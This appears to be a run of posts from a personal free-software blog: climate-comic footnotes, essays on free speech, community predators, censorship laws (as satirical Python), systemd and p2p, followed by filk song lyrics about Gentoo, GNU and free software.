  1. Not every place will become this uninhabitable. But almost every place will have huge adaptation cost. See Hansen et al. 2016. Let’s hope we rolled a 2-6; and let’s stop ruining our odds. We need to go green. 

  2. This says 2025 to have a number here. The actual paper says “If rapid phaseout of fossil fuel emissions begins soon, most extraction can be via improved agricultural and forestry practices”. The IPCC discusses faster phaseout to have some possible emission left in 2025 for those parts of economy which cannot be changed to renewable sources fast enough. 

  3. The probabilities are from the fifth IPCC report: “Climate Change 2014: Mitigation of Climate Change”, Chapter 6, Figure 6.14: Probability for staying below 2°C [warming]. 

  4. We would not be the first civilization to fall. The Maya might have gone down due to self-inflicted droughts and famine (more about that by BBC). 

Attachments:
  • Mike_Perry-comic-roll-a-die-2014-climate.psd (11.5 MB)
  • Mike_Perry-comic-roll-a-die-2014-climate-new-text-cropped-1-and-2-and-3.xcf (10.52 MB)
  • Mike_Perry-comic-roll-a-die-2014-climate-new-text-cropped-1-and-2-and-3.png (2.27 MB)
  • Mike_Perry-comic-roll-a-die-2014-climate-new-text-cropped-1-and-2-and-3-500x725.jpg (133.17 KB)

Why free speech does not equal the right to be heard

→ written in a discussion with Sascha1 in Freenet using Sone.

If free speech included being allowed to force all people to listen, then it would also include my right to force you to listen to everything I say.

Think of this on the scale of 6 billion people all using Freenet. Every one of them could force you to listen to him/her/it. Whom would you ignore?

In WoT getting some people2 to see your message is possible, but it has a price: solving captchas.

The same is true for real life demonstrations: If you want to be seen, you have to get up and actually invest something - be it time, effort or risk to your reputation.

In real life we have channels through which we sell our attention. They are called advertisements and advertisement financed services, and access to our attention is tightly controlled by some few gatekeepers who make lots of money by keeping a hold on our attention.

In freenet all you have to do for being seen is solve some captchas, a rule which is the same for everyone.


  1. this is only true for those people who decide to publish captchas. If they disable that feature, you can only get their attention by first getting trusted by people whom they trust. 

You cannot afford 1% predators

The discussion about sexual assault at conferences has been going on for a few years now. Moral reasoning has been discussed a lot, and I will not repeat that.1

Here I will give a dispassionate, cold and calculating reason why your community cannot afford to tolerate 1% predators:

If in a community of 50 men and 50 women, one person is a predator who attacks one woman every year and causes her to leave, and every year either a man or a woman joins, the community will be male-only after 100 years.

Even 1% predators is far too much.

To take this apart:

  • I assume that interest in the topic is equal between men and women.
  • I assume that the community starts out with 50 men and 50 women.
  • Now I add a single predator who attacks one woman every year.
  • The woman subsequently leaves.
  • One new person joins to take her place. Since interest is assumed equal, there’s a 50% chance that it’s a woman and a 50% chance that it’s a man.
  • Overall the community therefore loses one woman every second year.
  • Within 100 years there will not be a single woman left in the community (the simulation sketch below illustrates this).
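
To make the arithmetic tangible, here is a minimal Python sketch of exactly these assumptions. The numbers and names are mine, chosen to mirror the example above; it is an illustration of the expected dynamic, not a demographic model:

  import random

  def simulate(years=300, men=50, women=50, seed=42):
      """Toy model of the list above: one predator drives away one woman per
      year; each person who leaves is replaced by a new member who is a woman
      or a man with equal probability."""
      random.seed(seed)
      for year in range(years):
          if women == 0:
              return year  # from this year on the community is male-only
          women -= 1       # one woman is driven away by the predator
          if random.random() < 0.5:
              women += 1   # the replacement happens to be a woman
          else:
              men += 1     # the replacement happens to be a man
      return None

  # On average the community loses one woman every second year, so starting
  # from 50 women it ends up male-only after roughly 100 years.
  print(simulate())

Varying the seed shifts the exact year somewhat, but the result stays close to the 100-year mark, because the expected loss is one woman every two years.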

Therefore no community can afford to tolerate even one predator per 100 people — regardless of how the predator causes women to leave.

Even 1% predators cause massive structural discrimination. If you tolerate those 1% of people, you lose 50% of your community — and, all moral issues aside, no community should burn half their members for the sake of the 1% who might be predators.

Note that most people in such a community won’t notice the predatory behavior, simply because most of the time they will only interact in smaller subgroups of 5 to 10 people. If in a community of 100 people more than 10 people noticed something odd, that’s a big red flag that there might be a predator in the group who could hurt and drive away half the community if not stopped.

PS: The same goes with the genders reversed: Anyone who makes one person of one specific gender leave every year can effectively render a community single-gender.


  1. Just read the following twitter thread if you need a refresher on the moral issues: So I was at an academic conference this weekend and had to physically intervene to prevent a sexual assault by a male colleague on a female colleague who was drunk to the point that she was clearly not in control of herself, and unable to exercise judgment or consent.Brad Simpson (@bradleyrsimpson) (June 22, 2018) 

def censor_the_net()

def censor_the_net():
  "wealth vs. democracy via media-control"
  try: SOPA() # see Stop Online Piracy Act 
  except Protest: # see sopastrike.com 
    try: PIPA() # see PROTECT IP Act 
    except Protest: # see weak links 
      try: OPEN() # see red herring 
      except Protest: 
        try: ACTA() # see Anti-Counterfeiting_Trade_Agreement 
        except Protest: # see resignation⁽¹⁾, court, vote anyway and advise against
          try: CISPA() # see Stop the Online Spying Bill 
          except Protest: # see Dangers
            try: CETA() # See Comprehensive Economic and Trade Agreement
            except Protest:  # see ePetition 50705
              try: TTIP() # See Transatlantic Trade and Investment Partnership
              except Protest: # see TTIP-Protest erreicht Brüssel and Wie wir TTIP gestoppt haben
                try: TISA() # See Secret Trade in Services Agreement (TISA)
                except Protest: # see Unter Ausschluss der Öffentlichkeit
                  try: JEFTA() # See Wie TTIP und wieder hinter verschlossenen Türen
                  except Protest: # see deep concern und TTIP auf Japanisch verhindern und Ein Kniefall vor Japan? und JEFTA Leaks
                    try: Article11And13() # See Die Zensurmaschinen und das Leistungsschutzrecht kommen in die Zielgerade der EU-Gesetzgebung 
                    except Protest: # see Stop the censorship-machinery! Save the Internet!
                      try: FreiwilligeRasterung() # See Mit Hashabgleich und TPM 
                      except Protest: # see nur für gute Menschen and „eine neue Zensursula-Kampagne“ and „Wenn Privatsphäre kriminalisiert wird, werden nur Kriminelle noch Privatsphäre haben.“
                        try: TERREG() # See TERREG-Verordnung
                        except Protest: # see discord.savetheinternet and TERREG-Sharepics and Uploadfilter auf Steroiden and new online censorship powers
                          try: Chatkontrolle() # See Nachrichtendurchleuchtung
                          except Protest: # see KI Anzeige wegen Sexting and Wiretapping Children and Deutscher Anwaltsverein and Strategic autonomy in danger and Kinderschutzbund gegen anlasslose Scans verschlüsselter Nachrichten and droht unsere Strafverfolgung…lahmzulegen and das verdächtige Bild
                            try: CETA_in_Gruen() # See Ratifizierung im Galopp
                            except Protest: # see Ceta bleibt falsch and Zu wenig staatliche Kontrolle
                              if destroy_free_speech_and_computers(): # (english video)
                                from __future__ import plutocracy 
while wealth_breeds_wealth and wealth_gives_power: # (german text and english video) # see wealth vs. democracy via media-control (german)
  censor_the_net()

This code is valid Python.

Feel free to use and change this snippet, as long as you include a reference to this page (http://draketo.de/node/475 or http://draketo.de/light/english/politics/def-censor-the-net-2012) or my name (Arne Babenhauserheide).



default answer to “I want to connect with you on [hip unfree service]”

I just decided to give a default answer when I get some email from people asking me to connect to them on some new unfree service:

Hello [Person],

You asked me to connect with you on some unfree service. If you still want that, just use a status.net-server. Those are federated, so you can use a number of different providers and still be connected to everyone on any other server. As an example, see quitter.se — or check the server-feature list1.

You can then subscribe to me on sn.1w6.org/drak.

It’s bad enough that I have Twitter and G+. I don’t see value in another non-federated service.

Best wishes,
Arne

PS: Join the Federation!


  1. http://federation.skilledtests.com/select_your_server.html "Public Status.net server comparison" 

don’t change your habits - fix your tools!

→ In don't run 'strings' on untrusted files Michal Zalewski complained that running the strings utility for computer forensics or other fields of information security could make you vulnerable yourself, so you should not do that. Given that strings is Free Software, I draw a different conclusion from the vulnerability of tools used by professional forensics people.

I’d say if you’re actually using these tools to earn money, it is high time to go in and fix them. Also the linked bug (nine years ago) is marked as fixed. So there are people doing that.

Software has bugs. Free Software makes it possible for people who rely on it to fix problems they encounter - especially when they rely on it for their profession.

That’s part of the point of allowing commercial use of Free Software: To allow expert craftspeople to collaborate on improving their tools.

PS: Naturally there’s a limit to fixing the tools. There are habits which should be changed, but if the tools don’t get worse for other things by fixing them, those changed habits are workarounds which should be replaced with clean fixes.

identi.ca Group: Out of Group (!oog)

What !oog is

The Out of Group group is a way to request taking a sprawling discussion out of group (so you don't spam all the people who are in the group where the discussion started, but who simply want news).

Motto

Please discuss out of group. You can wrap up the discussion afterwards (link to the context) and add a group tag then.

How To

To request taking a discussion out of group, simply join !oog, add !oog to your message and then leave the group again (except if you want to see other !oog requests).

For example you can use the following to request moving !oog:

Please let us continue the discussion !oog and wrap it up afterwards. It disturbs others in here. !group1 !group2

Background

This is a reaction to a discussion about the use of group-tags in discussions.

Archived discussion

Available under the Creative Commons Attribution 3.0 license.

  • rysiek
    @teddks: stop using group tags, please. everybody on !ubuntu and !linux have heard enough, really.

  • teddks
    @rysiek I respond to in-group messages in-group. If you don't want me to use them, don't use them to me. !ubuntu !linux

  • arnebab
    @rysiek @teddks please leave the group tags out, both of you.

  • teddks
    @arnebab My policy for group-posting rebuttals was posted a bit ago.

  • arnebab
    @teddks please discuss out of the group. You can wrap up the discussion afterwards and add a group tag then. You're one post from a block.

  • arnebab
    @teddks By not discussing in the group you make the others' in-group posts look silly. Otherwise you just look silly yourself.

  • teddks
    @arnebab Wait, what? I only discuss in-group if the previous post was in-group.

  • arnebab
    @teddks That principle doesn't scale. If we all used it groups would be useless. A wrapup post can get people to read all http://is.gd/6CoYI

  • teddks
    @arnebab I might start doing that for oog discussions, but I'm not going to deny myself the same forum my opponents have.

  • arnebab
    @teddks they are not opponents but discussion partners. And they look silly if they stay ingroup while you post oog. Just ask them to go oog

  • arnebab
    @teddks and wrap it up later. If they insist on staying ingroup, just post one ingroup request to come oog and let peer pressure do the rest

  • arnebab
    @teddks they broadcast to people who aren't interested and will block them.

  • arnebab
    @teddks sorry for the phraselike answer. 140 chars aren't ideal for discussing more complex topics...

  • teddks
    @arnebab I understand. I kind of regret how identi.ca has taken the place of IRC for a lot of things.

  • teddks
    @arnebab That's irrelevant; in-group they get to broadcast their arguments and their views. I'm not going to deny myself that.

  • arnebab
    @teddks That means I have to block you when you post your next ingroup broadcast. You lose all readers that way.

  • teddks
    @arnebab Now you are inviting spam and personal attacks against me in !ubuntu. Is that pursuant to the Code of Conduct?

  • arnebab
    @teddks You do know that people can see the context with one click, do you?

  • teddks
    @arnebab I don't see what you're implying - that I should depend on clickthroughs to have my arguments be heard?

  • arnebab
    @teddks Since you kept spamming the !ubuntu and !linux group and explicitely said you won't stop ( http://is.gd/6Cucx ) I blocked you.

  • teddks
    @arnebab I can't respond fully now, but I will later. I'm sorry that the #Ubuntu group's de facto policy is now one of censorship.

Note: arnebab was not a member of the ubuntu group at that time. The block was/is a purely personal one: Nothing teddks writes will appear on arnebab's timeline until he unblocks teddks.

p2p-networks help law enforcement catch hard criminals

Comment to: Local man faces court on child pornography charges by heraldstandard.com

As I see it, the only reason the authorities could track him at all was his use of p2p-networks.

At the moment, technology makes it relatively easy for the police to track hard criminals in p2p-networks, but it also allows people to commit small infringements rather safely (just like people don't stop at red traffic lights when there is no car in sight).

So I consider the current state quite ideal.

Sadly there's an organisation called the RIAA1 which drives p2p-networks underground and which will eventually either cease that action or gain the "fame" of having been the one organisation responsible for forcing p2p-networks to evolve into completely anonymous and untrackable networks, where hard crimes can no longer be tracked.

So this case shows once again that noncommercial "piracy" shouldn't be attacked but should instead be allowed and even fostered, because it increases social welfare (access to media is improved, while there is no significant damage to sales) and in many cases even helps law enforcement catch criminals who really do damage (and in this case: did very much damage).

Information about the impact of p2p-networks, based on a study from the University of Chicago: - http://www.journals.uchicago.edu/JPE/journal/issues/v115n1/31618/31618.html - http://www.journals.uchicago.edu/cgi-bin/resolve?JPE31618PDF (open twice to read)


  1. The RIAA is nowadays accompanied by the MPAA. 

power and blindness: the tragedy behind systemd

→ comment to The Tragedy of systemd, where Benno Rice said that he’s impressed by the way systemd spread into most GNU/Linux distributions and that systemd is a source of ideas for BSD.

Looking at the methods used to force distributions to adopt systemd - e.g. adding hard dependencies in the biggest desktop environment, or bundling udev and continuously tightening udev’s dependency on systemd - that’s a form of power-play against the distributions. A dependency I really don’t want. One group decided that they wanted to force everyone else to buy into their new system. And then they used every leverage they could get to do that.

SystemD developers decided to become the one group that can dictate conditions to everyone else.

I can see the skill in that power-play, and be impressed by the skill, but seeing how that power is used and what methods are used, I am also horrified by what they did and how they will continue to abuse that power they now grabbed.

About systemd being a source of ideas: systemd contains quite a few ideas that come straight from the Hurd, but have worse implementations in systemd. Systemd solves problems by tacking things onto Linux — problems that have been solved in the Hurd in a clean way 15 years ago. For good ideas, don’t repeat the mistake of ignoring the Hurd. Instead first look at the clean implementation and take care to put functionality at the right level.

In hindsight, SystemD is the consequence of ignoring that the Hurd solves real problems. Of ignoring the technical advantages of the Hurd.

power and deception

A religious leader is nothing more than a media-star who managed to convince people that the tale, in which he or she is special, is actually true.

Just like aristocrats managed to convince people that what their ancestors did gives them the right to control the lives of other people.

And like the rich convince people that money gives them the right to control a larger part of the world than others.

“If you like what I do, why don’t you help me?”

Almost every free software developer has had the experience that many people like his or her work, but very few actually provide help. If you experience this, don't let it dishearten you. Verbal support without practical help sounds inconsistent at first, but it is actually the result of limited time.

Most people who have the skills to help are already committed to other projects, so they cannot help you on yours. They can encourage you from the sidelines ("This is cool! If I had time, I'd gladly help!"), but they cannot dive into the code, understand it and help improve it.

If you have 100 fans, one might actually have the resources to provide help. And this is not limited to software.

See for example how this works in media: A video from a cappella artist Smooth McGroove gets 250,000 views on YouTube and 15,000 likes. It is funded by 750 people (with at least $1 per video - about 200 give at least $5). These are the numbers for someone who has 45,000 followers on Twitter and 160,000 likes on F***b***. And who's a legend in the gaming community - while being funded by only 750 people (including me).

250k viewers, 750 supporters. 3 in 1000 people support him (it’s enough for him to work full-time on his art). That’s the scale I want to show here. And this scale is visible when it’s just about giving One Dollar - the equivalent of 5 minutes of work. Much less than the time it took me to compose this text.

So whatever project you do: If few people help you, keep up your spirits: You are competing against every other project out there for their time and money - and some of these projects might be their own creations.

And when even a single person supports you, remember that this is a huge statement of support - much bigger than it seems when you are focussed on the work you do.

(This is the best time to again thank everyone who ever supported me: Thank you for your help! I don’t earn enough to fund the cost of my server, but everything I get is like a little star which lights up in my heart and shows me that there are people who care enough to give me something for the stuff I do.)

(Written in a bug-report for el marmalade)

Songs

Below you find some of my songs.

To see only songs which have a recording I deem "listenable", please check the

 

< < Songs in the Wind of Time > >

 

- they also feature a PodCast.

Happy listening!

Besides: If you speak German (or just happen to like it), you might enjoy some of my German songs.

(All this is) Gentoo for me

Gentoo for me Logo - Words and Music: Arne Babenhauserheide ( http://draketo.de )


Listen to the song: ogg
This recording is part of the music podcast singing in the winds of time.

Refrain:
  I build my kernel and I strip it down,
  my programs only do what I need
  the tree is at my very core
  it's my whole world and it is my seed.

I came to Gentoo several years ago,
it's power was my joy and woe,
replaced OSX with a mighty shell,
and learned its ways and learned them well.

(well mostly, and learning at times is a hell)

--

I rebuilt only 2 times since that day,
for at first I didn't know my way,
the second one was a lovely bird,
but a new Computer brought the third.

(someday I want a Gentoo GNU/Hurd)

--

I learned each day and my knowledge grew,
from the wiki and forums it leaped and flew,
information in structure gave power in mind,
and the strongest is what the tutorials bind.

(but read them well, or trouble's what you find)

--

A new life came when I met the snake,
I'd been asleep, now I'm awake,
for portage might be quite complex,
but reading Python's sometimes close to sex.

(go deeper and deeper and the world seems to shift)

--

Somewhere between some seedlings appeared,
with stuff for special people geared,
sometimes dangerous, but mostly good,
and the tree had grown a little wood.

(but remember where the main trunk stood)

--

And now the tree has KDE 4,
since that appeared I like it evermore.
All that nifty stuff I missed from my Mac,
usability and beauty and the vision are back.

(and don't forget power, more than any I knew before)

--

Together all this is Gentoo for me,
but there sure is more I don't get or see,
and some parts for which I feel quite strong,
just didn't fit into this song.

(Gentoo's much too large to fit into any... )


PS: I just uploaded this into my Jamendo Account.

PS: I just found another (older) Gentoo song.

Attachment  Size
gentoo_for_me-v0.3.ogg  4.21 MB
Gentoo-and-Python-60x70.png  5.78 KB
Gentoo-and-Python.svg  215.76 KB

A song from the icy lands

A song about sharing and free software and changing the world. Originally written to recreate the vision of the Polar Skulk in art.

Criticism and praise would be a great gift to the pup writing this song.

A song from the icy lands

Freedom for Music, for Movies and for every word,
Fighting is not quite absurd,
and we are peaceful, good and kind,
and fight for freedom of the mind.

--

Ref1:
Our world is ice,
but we're together,
calling to the moon,
the cousins of the wolf.

Our tales of freedom
light a fire
of love and family,
the song of foxes.

we teach the wolves,
and sing of beauty,
gather wisdom,
and sing the music of the world.

Our world is ice,
but we're together,
calling to the moon,
the cousins of the wolf.

Our tales of freedom
light a fire
of love and family,
the song of foxes.

we teach the wolves,
and sing of beauty,
gather wisdom,
and free the music of the world.

--

Our skulk is happy with that which is free,
we spread the free things which we see,
like Gnus, who made the firelight,
we spread the freedom in the night.

--

Ref2:
-Ref 1 but:

... learn the wisdom of the world

... free the wisdom of the world.

--

Each night we meet artists who give us their songs,
and more learn each day, where the music belongs,
and wherever we travel, a seed takes its hold,
and singing and dancing shine brighter than gold.

and wherever we travel, a seed takes its hold,
and singing and dancing grow stronger than gold.

--

Ref3:
-Ref 1 but:
... dance the rhythm of the world

... change the rhythm of the world.


If you liked the song from the icy lands, you might also like a tale of foxes and freedom and Infinite Hands.

Dragon Cycle

The War of Dragons and Birth of the Dragonriders Sung and played at FilkCONtinental 2004.

No music yet - but someday I'll get that recording...

Dragon Cycle 1: Dragons Lament

Ah_ah_ah...

What have those people done?
The Dragon lies there, in Her own blood.

Ah_ah_ah...

What have those people done?
The Dragon lies there, in Her own blood.

Ah_ah_ah...

They came in great hordes,
The Dragon lies there, in Her own blood.

Ah_ah_ah...

They came in great hordes,
The Dragon fought, but not well enough.

Ah_ah_ah...

She killed many hordes,
The Dragon fought, but not well enough.

Ah_ah_ah...

She killed many hordes,
But at last, She lost to the flood.

Ah_ah_ah ... ah___

Dragon Cycle 2: Step into their Land

I come to you for my child has cried,
      and my mate is dead.
I know, you're shivering now in dread,
      but don't you fear for your hide.
No dragon will burn your cities down,
      when you give what we demand.
The bodies of those, who took her life,
      shall Die from human hand.
      They shall die from Human Hand.
For dragon's Law and Custom, now,
      I'll fold my wings till sundown,
      To see what you decide.

Dragon Cycle 3: Capture

Puny Human, what have you Done?!
You call powers, which aren't yours to control,
which will sweep all away, when used in war.

The bonds on this, my body, will not hold forever,
and when they perish, so will You!

Back off in fear, that I might use what you did,
which neither Dragon nor Human should ever touch.

Why don't you leave wizard?

Show me that, which you clutch in your robes,
black as they are to block my view.

No! You know not, what you do!
I call on all you learned through your study of magic,
don't soil your soul any more
by forcing what is immortal
into your human shape!

Don't you dare!
You and your offspring
shall be hunted by all dragons
for now and forever!

A childs voice: "Where am I? Where am I?"

Act: *drop down and look up like an innocent unknowing child.*

Dragon Cycle 4: Flight and Slaughter

    e              C      D
The dragons in all glory ceased to fight,
        e          D          e
    as wizards power scorched their wings.

As human armies marched along, in greatest size,
    With wizards in their leading ranks.
The dragons left the battleground without a single strike
    left inhabited lands.

They fled to lonely forests, dark and lush,
    The humans burned them down.
They fled to plains and grasslands, never seen and never touched,
    the humans brought their crown.

They then fled to dark marches, where sunlight never shines,
    a thousand workers pumped them dry
And then at last they all drew back,
    to mountains near the sky.

|| Instrumental ||

e                 D     e
In darkness dances a little flame,
         C                     D
    from teeth it leaps, from breath it came

And sparkles bright on polished stone,
    on scales of one, who sleeps alone,
And dreams uneasy dreams at night,
    of hunger suffering thirst and blight,

And each time a being dies in vain,
    the dragons body shakes in pain,
For she, the oldest on this land,
    can feel the pain, the fury, the hate
    and despair of all who live.

|| fade out. then spoken ||

Into this darkness sounds a step,
of boots of metal, cold and rash,
the ringing of swords, when unsheathed,
and many boots, and always more.
scaled eyelids flutter and rusty red eyes
shimmer as the light of the moons gets caught therein.

"Why do you invade my home?
You gain little by slaying me, but
the world loses a close friend with me."

Nothing answered but the singing of steel,
when it is flung through the air,
and the blood of a dragon wet the ground this day,
and the rage of the dragons got unleashed,
when the swords returned to their sheaths.

Dragon Cycle 5: Death and waking

Fire sweeping over the land,
destruction and death,
the dragons are free.
-
Hate and fury in the village,
wings bring storm
and burning hail.
-
The fire burns the woman,
burns the man,
the dragon nears the child.
-
Eyes of fury meet the fear,
nostrils taste
the anguish of the child.
-
Fire builds deep in the guts,
leaps from teeth,
and stops down dead.
-
A cry meets dragons fury
"Leave my sister!"
The dragon stops.
-
From rags beneath the window board
a child rises
and stares the dragon down.
-
Fingers grow to dragon claws,
Teeth grow sharper, skin goes black,
fire burns the clothes. A dragon returns.
-
A voice of power, voice of War,
"We will not fight,
Not anymore!"

-
Bows then down to the childs big eyes,
Hot breath on her face,
quietly speaks:
"On my back you ride today,
we shall from now together stay,
and fly the winds as one."

Dragon Cycle 6: Bard's Fair

Dragon and human they fly on the winds,
their bodies floating ever higher.
Their bond of purity and of loving,
and something deep within their souls.

||: And they always remember the voice of war,
"We will not fight, not anymore!" :||

Drowsy Pagan (and his stew) - a Filk on Dawson's Christian

To the melody of Dawson's Christian by Duane Elms.



- PDF -

FilkTeX

Jason Drowsy was a hunter known to cook a burning stew,
and he turned to be a pagan in the hunt of eighty-two.
Now that pagan was the finest cook of the royal twins
and the stew of Jason Drowsy smelled like sins.

In the hunt for the kings wedding, waiting for the royal son,
he then saw a regal steed who was equal to no one,
as the royal son came by him, and he rode out for a prize,
Drowsy knew too well which monster he would slice.

No one talking saw the battle, though the guard was quick to leave,
when they reached the site they found a scene no sane man could believe.
Dead in grass there lay the princeguard, cut to ribbons all around,
but no sign of Jason Drowsy could be found.

Chorus 1:
There are stories of the nightwatch and the ents and dragonwood,
there are stories of the unicorn with a lady at his foot,
but the tale that warms my spirit more because I know it's true
is the tale of Jason Drowsy and his stew,
yes the tale of Drowsy pagan and his stew.

- break for music -

I was second scout for heras dream, the escort was all mine,
we were shipping precious metals and a carriage with wine,
It was in the second week of the most uneventful ride,
when the cold and snow froze all our breath at night.

Now to me there was no question, for there was nowhere to run,
and you just can't keep on moving when you never see the sun,
so we stopped and built a campsite for a time in freezing snow,
when in underbrush a light began to glow.

First we thought it a predator, but the color was all wrong,
then we thought it might be rescue, but no sound of horn did come,
when noone answered hailing we all felt an unknown dread,
then the fire grew and started burning red.

Now a glow came from that fire that is known by very few,
and we never knew a meal could smell just like that special stew,
never fearing our numbers then a figure left the wood,
and he carried a huge bowl which smelled too good.

Chorus 2:
And that pagans stew burned hotter than all stew I ate before,
and its taste would melt to easily the heart of any whore,
as the meal then filled our stomachs and we searched for some more shreds,
all the fear of cold was wiped from our heads,
all the fear of cold was wiped from our heads.

Just as quickly as we started all the feasting then was done,
for the cold inside had vanished and the strangers stew had won,
though we tried to call and thank him, not an answer could we draw,
then he dropped the bowl and this is what we saw.

It had markings there all over and an emblem on one side,
and we knew that every owner but that pagan had long died,
for the markings spoke of royalty, and deep inside we knew,
we all ate from Drowsy pagans fabled stew.

But instead of staying with us, he then simply walked away,
but came back each night with more stew tasting as if made by fey,
when at last the cold did lift, deep inside us each one knew,
we were saved by Jason Drowsy's burning stew, yes, we were saved by Drowsy pagans burning stew.

- Chorus 1 -


Background: I really love the sound of Dawson's Christian, but I never liked the name of the ship - and I learned from my parents not to glorify violence, at least not all the time. Violence is the ultimate escalation of a conflict, so it is well suited to stories, but there are much more important things in life than being the best soldier - for example being the legendary cook who saves caravans from freezing to death and who chose a life in the wilderness over a life serving his king when he realized what's really important in our world.

Attachment  Size
drowsy-pagan.pdf  48.44 KB
drowsy-pagan.flk  3.3 KB
drowsy-pagan-thumbnail.png  7.75 KB

Filk the gist

A parody of March of Cambreadth (mp3) by Heather Alexander aka Alexander James Adams, the Fairy Tale Minstrel, written on the filk-de list to say “damn, we are filkers! We don’t squabble about politics — we sing about them!”

Filk the gist

Keyboards klick, Cellphones ring,
Shining laptop’s hackers sing,
Newsfeeds burn with polished prose,
Show us where we find our foes,
Midnight flame with congressmen,
Fight the trolls to keep us sane,
Sound the horn and call the cry,
How many of us can spot their lie?

Fuck the orders you get told,
Make their shallow hearts get cold,
Fight until you die or drop,
A force like ours is hard to stop,
Close your mind to stress and pain,
Write till you’re no longer sane,
Let not one wrong word pass by,
How many of us can spot their lie?

Guard your disk and emails well,
Send these bastards back to hell,
We’ll teach them the cyberway,
They won’t write in our clay,
Use your shield and use your head,
Fight till every line glows red,
Raise the flag up to the sky,
How many of us can spot their lie?

Dawn has broke, the time has come,
Publish to a marching drum,
We’ll win the war and pay the toll,
We’ll fight as one in heart and soul,
Midnight flame in filkers list,
Write the songs and catch the gist,
Sound the horn and call the cry,
How many of us can spot their lie?

Hackers blog while Filkers sing,
Pegasus has spread its wing,
Yesterday we were too shy,
How many of us can spot their lie?

PS: And to make crystal clear what I mean, because it wasn’t on the mailing list: Politics in song are Filk, and this song is against lying politicians! I’m sorry, Le-matya. This was meant to support your position, but I forgot to double-check whether that is clear in the context.

Happy Birthday to GNU - 25 years

Today is the 25th birthday of the GNU project - the very beginning of the free software community we are today.

This is my small, humble contribution for the birthday celebration.

Happy Birthday to GNU (ogg vorbis)

Happy Birthday to GNU,
Happy Birthday to GNU,
Happy Birthday not Unix,
Happy Birthday to GNU.

Naturally this recording is free licensed.

It is part of the music podcast singing in the winds of time.

Attachment  Size
Happy_Birthday_to_GNU.ogg  215.82 KB

In Circles / The memory of time

I feel the time pass in our circles,
each year another one changed,
a head has turned white,
a hand has gone wry,
growing older as time passes by.

In our circle the time is a slide-show,
each year adds a picture or two,
and our memories in vivid colors
show the changes within me and you.

Here we see life as it happens,
see how choices affect our self,
see who will come near
of friends we hold dear,
who blossoms and who confronts fear.

Some of you have brought your children
or were children when first you came,
the flow of time never stops running
with none of us staying the same.

So time is present in circles,
I’m feeling it turning the wheel,
and life gains in meaning,
with time always stealing
our hours while making them real.

Infinite Hands - singing a part of the history of free software (filk)

- Free Software version of "Finity's End"; original: {lyrics: CJ Cherryh, music: Leslie Fish}.
- filked by Draketo aka Arne Babenhauserheide (draketo.de) (capo 3)

 

- please check the dedicated site: http://infinite-hands.draketo.de -

 

Songtext for printing and passing on: pdf | odt (source) | txt
Audio-files: ogg | mp3
This recording is part of the music podcast singing in the winds of time.

==== Infinite Hands ====

C        a             D           a
Infinite Hands build a world to be free, 
    E       G            a
the digital space we all know, 
   C      (a)         D            a
unlimited use has the code that we write, 
    C             G            a
and freedom's the badge we all show.

     C                           D           a
The stuff runs our servers, our desktops and grids, 
     D                    a
by uncounted hands it was made, 
     a                     D         a
set out in the wild on the day it is born, 
        C             D           a
for our free running, long coding trade. 

Ref: 
    C             a          D           a
And no law shall bind us or keep us for long, 
       E       G                    a
for infinity's ours and infinity's free, 
     C          a           D             a
and no country owns us, and no land's our own, 
    C         G        a
for Infinite Hands are we. 

The companies thought that they'd pay us for lines, 
and have all the code for their own. 
"You're company people and company teams, 
your code will now serve us alone."

R.Stallman was only a student that day, 
and he said to himself, thinking deep: 
Farewell to a job, all my code shall be free, 
for what they don't own, they can't keep. 

-Ref-

The miracle came, he did not change his mind
and gathered around him a crew, 
and people could buy his free programs from him, 
sent by mail and his money got through. 

At times others came and they said, "We're free, too, 
you can take code as if in a mall. 
It will be only yours then, just say it's from us, 
and it runs and compiles where you call."

-Ref: But... -

Now Richard M. Stallman was vexed and annoyed, 
and he sent out the word as before: 
"All code must be free, free to use and improve, 
which our license ensures evermore."

But still many coders were lured from our ranks, 
Now for Windows and Apple they strived, 
- spoken in background: And for Amiga, BeOS, IBM, 
    and many more -
their doom and their fall came from finland one day, 
as to GNU a free kernel arrived.

-Ref-

"Come all to U.S.", came a call spreading wide, 
"for there is no place else you can be."
 - spoken in background: DMCA, DRM, TCPA, 
    software patents, idea patents and a war on terror - 
But Richard M. Stallman still sent out the word, 
that all code from now on must be free. 

So code would stay free and our teams did grow strong, 
but some loopholes remained in our side, 
which traitors like TiVo exploited to steal, 
so we needed a change in the right. 

- Ref-

... no words ... 

So our license reshaped by the people and GNU, 
for code contributed to trade, 
And orders be none to withhold us or bind, 
    C                       E          a
No law on our code but the license we made. 

Ref: 
      C             a           D           a
Just that law shall bind us and keep us for long, 
       E       G                   a
for infinity's ours and infinity's free, 
    C          a            D             a
and no country owns us, and no land's our own, 
    C        G               a
for Infinite Hands/Lines are we. 
    C       E        C           (G) a
are we, for Infinite Hands/Lines are we. 

Background:
This is a part of the story of free software, although it misses some details. While "Finity's End" was a work of fiction (the book is available on amazon.com, amazon.de and maybe at bookzilla.de), this story really happened and happens today.
For additional information please refer to GNU.

Licensing:
This song is free art available under the following four licenses (for details, please visit draketo.de/licenses). Permission to filk her work freely was granted by Leslie Fish (quote: "Anything to keep the internet free: Go for it!" - she's great! - maybe you'd like to listen in on her music?) and CJ Cherryh.

- GNU FDL
- GPLv2 or later or GPLv3 or later
- Art Libre v1.3 or later
- Lizenz für freie Inhalte v1.0 webstar

You can use any of those four licenses, because I can't yet know which license will make it to the general license for free art. Please keep all four licenses when you make changes, so we avoid licensing chaos. It doesn't use Creative Commons licensing, because cc does not protect the free availability of the sources (just think LaTeX and pdf).
Sources: infinite-hands.draketo.de

It was written by Draketo aka Arne Babenhauserheide, finished on 2007-09-28, improved by Alan Thiesen 2007-10-08.
Copyright © 2007 Arne Babenhauserheide.
Its first public performance was at FilkCONtinental 2007 (a filk convention on the Freusburg in Germany).

Missing topics: DRM, SCO, Open Source – I'd be glad to get suggestions from you! ( just use the comment field )

Arne Babenhauserheide
Attachment  Size
Infinite-Hands--free-software.ogg  3.62 MB
Infinite Hands.odt  15.26 KB
Infinite Hands.pdf  89.37 KB
Infinite Hands.txt  3.53 KB
Infinite-Hands--free-software.mp3  4.86 MB

Infinite Hands draft with Bodhran and Flute

A rough draft of Infinite Hands with additional instruments.

The Flute and Bodhran tracks were improvised on the spot and recorded yesterday in one go, so they are a bit rough :)

Also the vocals are finally up to date with the text.

I hope you enjoy it!

download

For more Information on the song, see infinite-hands.draketo.de.

If you want to dabble with the recording yourself, just grab the multitrack audacity-source.

And if you like the song, why don’t you flattr it?

Infinite Hands (Remastered Version)

Merlin remastered Infinite Hands with Bodhran and Flute. This is a copy of his text (translated from German).

